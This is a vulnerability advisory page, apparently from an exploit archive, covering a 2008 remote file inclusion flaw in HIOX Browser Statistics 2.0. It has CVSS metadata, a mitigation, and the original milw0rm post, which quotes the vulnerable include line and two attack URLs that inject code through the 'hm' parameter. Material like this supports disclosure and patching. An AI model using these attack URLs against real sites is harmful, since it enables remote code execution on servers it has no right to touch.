HIOX Browser Statistics 2.0 Remote File Inclusion Vulnerability

vendor:

HIOX Browser Statistics

by:

Ghost Hacker

8.8

CVSS

HIGH

Remote File Inclusion

CWE

Product Name: HIOX Browser Statistics

Affected Version From: 2

Affected Version To: 2

Patch Exists: NO

Related CWE: N/A

CPE: a:hscripts:hiox_browser_statistics

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

HIOX Browser Statistics 2.0 Remote File Inclusion Vulnerability

HIOX Browser Statistics 2.0 is vulnerable to a remote file inclusion vulnerability. The vulnerability is due to the 'hm' parameter in 'hioxupdate.php' and 'hioxstats.php' scripts not properly sanitized before being used in an 'include' function call. This can be exploited to include arbitrary files from remote locations by passing a URL as the 'hm' parameter. Successful exploitation requires that 'allow_url_include' is set to 'On' in the 'php.ini' file.

Mitigation:

Disable 'allow_url_include' in the 'php.ini' file.

Source

Exploit-DB raw data:

####################################################################################################
 HIOX Browser Statistics 2.0 Remote File Inclusion Vulnerability
 Ghost Hacker , R-h Team , Real Hack We Will Be Back Soon  :) 
####################################################################################################
[~] Found by : Ghost Hacker  - R-H Team -                      |,  .-.  .-.  ,|
[~] My Blog : http://gh0st10.wordpress.com                     | )(_o/  \o_)( |
[~] My Email : Ghost-r00t@Hotmail.com                          |/     /\     \|
[~] Name Script : HIOX Browser Statistics 2.0
[~] Download : http://www.hscripts.com/scripts/php/downloads/HBS_2_0.zip
#############################[ I love the Messenger of Allah Mohammad ]#############################
[~] Error (hioxupdate.php + hioxstats.php) :
include "$hm/browser.php";
[~] Exploit :
http://xxxx.com/[path]/hioxupdate.php?hm=Evil_Code
http://xxxx.com/[path]/hioxstats.php?hm=Evil_Code
#############################[ I love the Messenger of Allah Mohammad ]#############################
[~] Greetz :
Mr.SaFa7 & RoMaNcYxHaCkEr & Night Mare & Root Hacker & Dmar al3noOoz ,
All Members Real Hack & Members Arabs Security And All My Friends ,
####################################################################################################
 Ghost Hacker , R-h Team , Real Hack We Will Be Back Soon  :) 
####################################################################################################

# milw0rm.com [2008-07-30]